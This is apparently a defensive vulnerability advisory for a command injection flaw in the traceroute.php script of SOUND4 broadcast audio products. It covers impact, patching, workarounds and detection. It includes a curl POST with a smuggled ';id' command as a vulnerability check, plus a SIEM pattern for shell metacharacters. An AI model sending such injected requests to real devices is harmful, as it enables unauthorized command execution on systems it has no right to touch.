CVE-2022-50795
📋 TL;DR
CVE-2022-50795 is a conditional command injection vulnerability in SOUND4 IMPACT/FIRST/PULSE/Eco systems up to version 2.x. Unauthenticated attackers can execute arbitrary commands via a single HTTP POST request to traceroute.php, which creates and executes malicious files in /tmp. This affects all users running vulnerable versions of these SOUND4 products.
💻 Affected Systems
- SOUND4 IMPACT
- SOUND4 FIRST
- SOUND4 PULSE
- SOUND4 Eco
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise allowing remote code execution, data theft, lateral movement, and persistent backdoor installation.
Likely Case
Unauthenticated attackers gaining shell access, installing malware, or using the system as a pivot point for further attacks.
If Mitigated
Limited impact if proper network segmentation, web application firewalls, and file integrity monitoring are in place.
🎯 Exploit Status
Public exploit code exists on Packet Storm Security. The single HTTP POST requirement makes exploitation trivial.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Versions after 2.x
Vendor Advisory: https://www.sound4.com/
Restart Required: Yes
Instructions:
1. Contact SOUND4 for patched firmware. 2. Backup configuration. 3. Upload and install patched firmware. 4. Restart the device. 5. Verify traceroute.php is no longer vulnerable.
🔧 Temporary Workarounds
Remove traceroute.php
linuxDelete or rename the vulnerable traceroute.php script to prevent exploitation.
rm /path/to/webroot/traceroute.php
mv /path/to/webroot/traceroute.php /path/to/webroot/traceroute.php.disabled
Web Application Firewall Rule
allBlock POST requests to traceroute.php using a WAF or reverse proxy.
# Example nginx config: location ~ traceroute\.php$ { deny all; }
# Example Apache config: <Files "traceroute.php"> Require all denied </Files>
🧯 If You Can't Patch
- Isolate affected systems in a dedicated VLAN with strict firewall rules blocking all unnecessary inbound/outbound traffic.
- Implement network-based intrusion detection to alert on exploitation attempts targeting traceroute.php.
🔍 How to Verify
Check if Vulnerable:
Check if traceroute.php exists in webroot and test with curl: curl -X POST http://target/traceroute.php --data 'test=;id'Check Version:
Check device web interface or contact SOUND4 support for version information.Verify Fix Applied:
Verify traceroute.php returns 404/403 or test with same curl command expecting no command execution.📡 Detection & Monitoring
Log Indicators:
- HTTP POST requests to traceroute.php
- Unusual process execution from web server user
- Files created in /tmp directory by web server
Network Indicators:
- HTTP POST to traceroute.php with shell metacharacters in payload
- Outbound connections from device to unexpected destinations
SIEM Query:
source="web_logs" AND uri="/traceroute.php" AND method="POST" AND (payload CONTAINS ";" OR payload CONTAINS "|" OR payload CONTAINS "`")🔗 References
- https://exchange.xforce.ibmcloud.com/vulnerabilities/247950
- https://packetstormsecurity.com/files/170267/SOUND4-IMPACT-FIRST-PULSE-Eco-2.x-traceroute.php-Conditional-Command-Injection.html
- https://www.sound4.com/
- https://www.vulncheck.com/advisories/sound-impactfirstpulseeco-x-conditional-command-injection-via-traceroutephp
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5740.php
